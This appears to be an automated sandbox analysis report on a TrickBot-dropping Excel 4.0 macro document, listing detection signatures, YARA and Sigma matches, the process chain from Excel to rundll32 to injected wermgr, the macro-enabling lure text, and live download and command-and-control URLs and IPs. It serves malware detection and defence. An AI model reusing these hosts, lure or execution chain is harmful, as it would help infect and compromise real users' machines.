Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189 (renamed file extension from 29189 to xls)
Analysis ID:355607
MD5:7810830918f82b2acdcdb05d2d404bad
SHA1:095201dab7b66c1268e3921356a2870ad1dc628c
SHA256:c217faa8b517c65418d18c7b14ccb3c307cdbd0b477a7d09332aad25dcd52d81

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2344 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2296 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2424 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2352 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.2082507822.0000000000684000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000003.2082501308.0000000000684000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2086800503.00000000008C8000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2086715316.0000000000650000.00000004.00000020.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          00000004.00000002.2086590346.0000000000290000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.290000.0.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.290000.0.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2032, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2344

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://www.chipmania.it/mails/open.phpAvira URL Cloud: Label: malware
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FBCA0 CryptAcquireContextW,

                Compliance:

                barindex
                Uses insecure TLS / SSL version for HTTPS connectionShow sources
                Source: unknownHTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 45.155.173.242:443 -> 192.168.2.22:49170 version: TLS 1.0
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2087666935.000000006E899000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E1290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E46F0 FindFirstFileW,FindNextFileW,

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 8[1].jjkes.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc dword ptr [esp+40h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx eax, byte ptr [ebx]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ebx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: global trafficDNS query: name: www.chipmania.it
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.140.114.136:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.22:49166 -> 94.140.114.136:443
                Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49168 -> 142.202.191.164:443
                Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.22:49170 -> 45.155.173.242:443
                Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.22:49173 -> 200.52.147.93:443
                Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49175 -> 182.253.107.34:443
                Source: Joe Sandbox ViewIP Address: 142.202.191.164 142.202.191.164
                Source: Joe Sandbox ViewIP Address: 45.155.173.242 45.155.173.242
                Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
                Source: Joe Sandbox ViewASN Name: DYNUUS DYNUUS
                Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 45.155.173.242:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.136
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.173.242
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 194.5.249.156
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: www.chipmania.it
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: rundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wermgr.exe, 00000006.00000002.2352219199.0000000033720000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: wermgr.exe, 00000006.00000002.2353002125.00000000341D0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: rundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: wermgr.exe, 00000006.00000002.2352219199.0000000033720000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: rundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2088023481.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086990491.0000000001F77000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352700395.0000000033CF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: https://142.202.191.164/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/
                Source: wermgr.exe, 00000006.00000002.2347564361.000000000039F000.00000004.00000020.sdmpString found in binary or memory: https://194.5.249.156/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/
                Source: wermgr.exe, 00000006.00000002.2347516377.000000000031A000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2347500342.00000000002EE000.00000004.00000020.sdmpString found in binary or memory: https://200.52.147.93/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/
                Source: wermgr.exe, 00000006.00000002.2347558185.000000000038D000.00000004.00000020.sdmpString found in binary or memory: https://45.155.173.242/rob60/651689_W617601.4E09BB1E4C0BB7F7B798E195EF9953B3/5/file/
                Source: wermgr.exe, 00000006.00000002.2347522468.0000000000328000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

                System Summary:

                barindex
                Found malicious Excel 4.0 MacroShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsInitial sample: urlmon
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 15 " Once you have enabled editing, please click
                Source: Screenshot number: 4Screenshot OCR: Enable content button jl , ' ' "==~ " from the yellow bar above 1| 24 25 26 27 28 29 30
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
                Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above j'
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FB470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F43C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,HeapFree,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00102060
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FBCA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F8CA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000EE0F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E1290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F43C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E8010
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F7840
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00100870
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E44C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F90E0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F14F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E1500
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F6100
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F6D10
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F2580
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F89B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E9200
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FCA00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FBE20
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F7630
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FCE70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000EA280
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000EC290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000ECEB0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000FB700
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F3B00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000EE310
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E2720
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F5F70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F63A8
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000F17B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00190040
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2087834825.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2086823918.0000000001D90000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2352494352.0000000033B10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@9/11@3/6
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000E4C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\57CE0000Jump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{0FEC2C01-8020-E415-1103-B1060953776B}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBC3C.tmpJump to behavior
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
